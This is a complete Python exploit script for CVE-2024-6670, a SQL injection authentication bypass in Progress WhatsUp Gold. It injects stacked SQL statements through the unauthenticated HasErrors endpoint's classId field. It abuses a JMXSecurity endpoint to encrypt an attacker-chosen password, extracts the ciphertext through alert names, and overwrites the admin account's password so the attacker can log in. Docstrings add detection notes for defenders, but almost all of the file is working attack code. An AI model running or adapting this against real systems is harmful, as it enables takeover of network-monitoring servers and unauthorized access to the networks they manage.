"""
Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
Special Thanks to my dear friend Manish Kishan Tanwar @indishell1046
Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
"""
# Startup banner; in this listing it is only referenced by print(banner).
# It is display text and is not part of any request the script sends.
banner = r"""
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
"""
""""""
import urllib3
# Silences urllib3's warnings. Every request in this script is sent with
# verify=False, so TLS certificate validation is off for the whole run.
urllib3.disable_warnings()
import requests
import argparse
print(banner)
# Command-line interface: both options are required.
parser = argparse.ArgumentParser()
parser.add_argument('--target-url', '-t', dest='target_url', help="target url (e.g: https://192.168.1.1)", required=True)
parser.add_argument('--newpassword', '-n', dest='newpassword', help="new password to set for the administrator", required=True)
args = parser.parse_args()
# Strip trailing slashes so the f-string URL joins below do not produce "//".
args.target_url = args.target_url.rstrip("/")
def send_exploit(payload):
    """Send one SQL statement to the HasErrors endpoint through ``classId``.

    ``payload`` is placed between a closing quote and a ``--`` comment marker
    (``<GUID>';<payload>;--``), which is intended to make it run as a stacked
    statement after the application's own query. The POST carries no cookie,
    token or credentials, and its response is ignored, so the caller gets no
    success or failure signal from this function.

    Detection notes for defenders (every value below is a literal in this
    script):
      * request path ``/NmConsole/Platform/PerformanceMonitorErrors/HasErrors``
      * ``classId`` beginning with ``DF215E10-8BD4-4401-B2DC-99BB03135F2E'``
      * constant body fields such as ``deviceId`` "22222" and the key
        ``businesdsHoursId`` (spelled exactly as sent here)
    Literal matches cover the unmodified script only; a ``classId`` value
    that is not a bare GUID (it contains ``'``, ``;`` or ``--``) is the more
    general signal to alert on.
    """
    # psssst, I left a ton of IoCs, use them wisely
    final_payload = f"DF215E10-8BD4-4401-B2DC-99BB03135F2E';{payload};--"
    _json = {"deviceId":"22222","classId":final_payload,"range":"1","n":"1","start":"3","end":"4","businesdsHoursId":"5"}
    # verify=False: the server certificate is not validated.
    requests.post(f"{args.target_url}/NmConsole/Platform/PerformanceMonitorErrors/HasErrors", json=_json, verify=False)
def retrieve_result():
    """Read back the value that was stored behind the ``psyduck`` marker.

    Issues a GET, with no credentials attached, to
    ``/NmConsole/Platform/Filter/AlertCenterItemsReportThresholds`` and scans
    the JSON list in the response. Returns the first ``DisplayName`` that
    contains ``psyduck``, with that marker removed. Returns ``None``
    implicitly when no entry carries the marker, and terminates the process
    when the status code is not 200.

    Detection notes for defenders: the marker string ``psyduck`` appearing in
    a ``DisplayName`` of this report is an artifact of this script.
    Presumably ``DisplayName`` is backed by ``ProActiveAlert.sAlertName``,
    which the main flow overwrites -- inferred from the script flow, confirm
    against the database.
    """
    res = requests.get(f"{args.target_url}/NmConsole/Platform/Filter/AlertCenterItemsReportThresholds", verify=False)
    if(res.status_code != 200):
        print("(!) exitting now because something wen't wrong when requesting the route /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds")
        exit()
    for item in res.json():
        # First match wins; later marked entries are never inspected.
        if("psyduck" in item["DisplayName"]):
            return item['DisplayName'].replace('psyduck','')
def convert_to_varbinary(input_str):
    """Render comma-separated decimal values as a single ``0x...`` hex literal.

    Each element is parsed with ``int`` and written as upper-case hex, padded
    to at least two digits; the pieces are concatenated in input order and
    prefixed with ``0x``. Non-numeric elements raise ``ValueError`` from
    ``int``.
    """
    digits = "".join(f"{int(part):02X}" for part in input_str.split(","))
    return f"0x{digits}"
def encrypt_password_primitive(new_password):
    """POST ``new_password`` to the JMXSecurity settings endpoint.

    The same value is sent as both ``KeyStorePassword`` and
    ``TrustStorePassword``. No credentials are attached and the response
    (``res``) is never inspected, so the success message is printed
    regardless of what the server answered.

    NOTE(review): judging by the printed message and the later SELECT on
    ``GlobalSettings`` / ``_GLOBAL_:JavaKeyStorePwd``, the server is expected
    to store an encrypted form of the submitted value there -- not verifiable
    from this file.

    Detection notes for defenders: a POST to
    ``/NmConsole/WugSystemAppSettings/JMXSecurity`` without an authenticated
    session, and an unexpected change of the stored key-store and trust-store
    password settings, are the artifacts of this step.
    """
    _json = {"KeyStorePassword":new_password, "TrustStorePassword":new_password}
    res = requests.post(f"{args.target_url}/NmConsole/WugSystemAppSettings/JMXSecurity", json=_json, verify=False)
    print("[*] Used remote primitive to encrypt our passowrd")
# Main flow. The steps depend on each other and run strictly in this order.
# None of the helper calls reports failure, so a step that did not take
# effect only shows up later (retrieve_result() returning None makes
# convert_to_varbinary() raise).
print("[^_^] Starting the exploit...")
# Step 1: submit the chosen password to the JMXSecurity endpoint.
encrypt_password_primitive(args.newpassword)
# The account name is hard-coded; only the password comes from the CLI.
target_user = 'admin'
# Step 2: copy the stored GlobalSettings value into ProActiveAlert.sAlertName,
# prefixed with the marker 'psyduck'. The UPDATE has no WHERE clause, so every
# row of ProActiveAlert is overwritten -- a durable forensic artifact in the
# database.
encrypted_password_exfil_payload = "UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd')"
send_exploit(encrypted_password_exfil_payload)
# Step 3: read the marked value back over HTTP.
encrypted_password = retrieve_result()
# Presumably the value arrives as comma-separated decimal byte values; it is
# turned into a 0x... literal for use in the next statement -- TODO confirm.
encrypted_password = convert_to_varbinary(encrypted_password)
print(f"[*] encrypted password extracted -> " + encrypted_password)
# Step 4: overwrite WebUser.sPassword for the target account. An unexplained
# change to this column for 'admin' is the second database artifact.
update_password_payload = f"UPDATE WebUser SET sPassword = {encrypted_password} where sUserName = '{target_user}'"
send_exploit(update_password_payload)
# Remediation is the vendor fix for CVE-2024-6670. The table changes above
# are not undone by patching and need separate review on a host that was
# exposed.
print(f"[+] Exploit finished, you can now login using the username -> {target_user} and password -> {args.newpassword}")